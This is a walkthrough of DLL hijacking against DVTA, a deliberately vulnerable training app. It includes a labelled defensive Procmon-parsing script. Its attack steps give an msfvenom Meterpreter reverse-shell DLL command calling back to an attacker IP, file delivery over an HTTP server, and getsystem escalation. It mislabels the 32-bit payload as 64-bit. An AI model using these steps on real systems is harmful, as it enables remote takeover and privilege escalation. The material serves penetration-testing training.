DLL Injection: DVTA Walkthrough

Identify which missing DLL DVTA.exe tries to load, and from where, when it runs

First, launch DVTA.exe from its install path and, at the same time, start Procmon on the Windows machine as the admin user.

Once Procmon is running, go to Filter > Filter and add an Include rule for the process name DVTA.exe, as shown below.


You may want to add a few more filter rules so that only the relevant path and result status are shown. When hunting for DLL hijacking candidates, look for DLLs the application tries to load whose Result is NAME NOT FOUND (use an Include rule on the Result column).

With the filter applied, the following path looks like a good candidate for DLL injection.
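The same triage can be done offline on a Procmon CSV export (File > Save, CSV format). The script below is an added example, not part of the original walkthrough: it reads constructed sample rows in Procmon's default export columns and reports DLLs the process probed and failed to find outside protected system directories, which is the list a defender would check for weak directory ACLs. The sample data, PID and paths are made up; the protected-directory list is a coarse heuristic, not a substitute for reading the actual ACLs.

```python
import csv
import io

# Constructed sample of a Procmon CSV export, already filtered to DVTA.exe.
# Column names follow Procmon's default CSV export; times, PID and paths are invented.
SAMPLE_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","DVTA.exe","4120","CreateFile","C:\\Users\\user\\Desktop\\DVTA\\DVTA.exe","SUCCESS","Desired Access: Read"
"10:01:02.2","DVTA.exe","4120","CreateFile","C:\\Users\\user\\Desktop\\DVTA\\DWrite.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.3","DVTA.exe","4120","CreateFile","C:\\Windows\\System32\\DWrite.dll","SUCCESS","Desired Access: Read Attributes"
"10:01:02.4","DVTA.exe","4120","CreateFile","C:\\Users\\user\\Desktop\\DVTA\\DVTA.exe.config","NAME NOT FOUND","Desired Access: Read"
"10:01:02.5","DVTA.exe","4120","RegOpenKey","HKLM\\SOFTWARE\\DVTA","NAME NOT FOUND","Desired Access: Read"
"""

# Coarse heuristic: standard users cannot write under these trees, so a failed
# probe there is normal search-order noise rather than a hijack candidate.
PROTECTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def dll_hijack_candidates(csv_text, process_name="DVTA.exe"):
    """Map each DLL name to the non-protected paths where the process looked
    for it and got NAME NOT FOUND, i.e. the directories whose ACLs need auditing."""
    candidates = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Process Name"].lower() != process_name.lower():
            continue
        if row["Operation"] != "CreateFile" or row["Result"] != "NAME NOT FOUND":
            continue
        path = row["Path"]
        if not path.lower().endswith(".dll") or path.lower().startswith(PROTECTED_DIRS):
            continue
        dll = path.rsplit("\\", 1)[-1].lower()
        candidates.setdefault(dll, []).append(path)
    return candidates


def report(candidates):
    """One summary line per DLL, followed by the paths that were probed and missing."""
    lines = []
    for dll, paths in sorted(candidates.items()):
        lines.append(f"{dll}: missing at {len(paths)} location(s) outside protected directories")
        lines.extend(f"    {p}" for p in paths)
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(dll_hijack_candidates(SAMPLE_CSV)))
```

On the sample above this reports only DWrite.dll, probed in the application directory; the .exe.config and registry misses are ignored because they are not DLL loads.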


Now we know the name of the DLL we want to hijack. All that remains is to place our malicious DLL in that path and wait for the victim to run the application. We will create a 64-bit payload with msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.22.3 LPORT=4444 -f dll -o DWrite.dll


Now we need to deliver this malicious DLL payload to the victim machine. I will be using Python 3's http.server module to transfer the file. The following command starts a temporary Python 3 HTTP server:

python3 -m http.server 8080

On the victim machine, use the IE browser to navigate to the Kali box and download the file.

On the Kali box, get the reverse shell listener ready using the Metasploit multi/handler.

As soon as the user executes DVTA.exe on the computer, a Meterpreter shell spawns on the Kali box.


Once interacting with the Meterpreter session, type getsystem to elevate privileges; we now have SYSTEM-level access on the machine.
